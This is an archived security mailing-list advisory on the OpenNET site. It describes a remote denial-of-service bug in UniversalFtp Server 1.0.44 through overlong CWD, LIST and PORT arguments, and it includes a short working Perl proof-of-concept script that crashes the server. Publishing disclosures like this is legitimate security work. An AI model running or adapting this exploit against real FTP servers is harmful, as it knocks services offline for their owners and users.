The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


UniversalFtp Server 1.0.44 Multiple Remote Denial of service


<< Previous INDEX Search src / Print Next >>
Date: 14 Feb 2008 20:03:52 -0000
From: [email protected]
To: [email protected]
Subject: UniversalFtp Server 1.0.44 Multiple Remote Denial of service
X-Virus-Scanned: antivirus-gw at tyumen.ru

# UniversalFtp Server 1.0.44 Multiple Remote #Denial of service
#
#@nolife : This bug has been found with a brain , ten fingers, a keyboard , and a laptop , one of my best Tool i ever tryed. Stay tuned for more tools hint .
#
# 
# Réponse:	226 Completed...
# Statut:	Liste du répertoire complétée
# Commande :	LIST aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...... ......... ...........
# Réponse:	150 Directory...
# Statut:	ftpcontrolsocket.cpp(1764): Waiting for replies to skip before sending next command...   caller=0p12e69f8  --> 0_o
# 
#functions vuln : CWD (2 A) , LIST ( 4102 A) ,PORT (2 A) 
#
#
# PoC :
use Net::FTP;
(($target = $ARGV[0])) || die "usage:$0 <target> <port>";
my $user = "anonymous";
my $pass = "something";
print "Trying to connect to :$target...\n";
$ftp = Net::FTP->new($target, Debug => 0, Port => 21) || die "could not connect";
print "Connected!\n";
$ftp->login($user, $pass);
$ftp->cwd("AA");
print "Poc Successfull the server should down now \n";
$ftp->quit;


<< Previous INDEX Search src / Print Next >>



ðÁÒÔΣÒÙ:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
èÏÓÔÉÎÇ:

úÁËÌÁÄËÉ ÎÁ ÓÁÊÔÅ
ðÒÏÓÌÅÄÉÔØ ÚÁ ÓÔÒÁÎÉÃÅÊ
Created 1996-2025 by Maxim Chirkov
äÏÂÁ×ÉÔØ, ðÏÄÄÅÒÖÁÔØ, ÷ÅÂÍÁÓÔÅÒÕ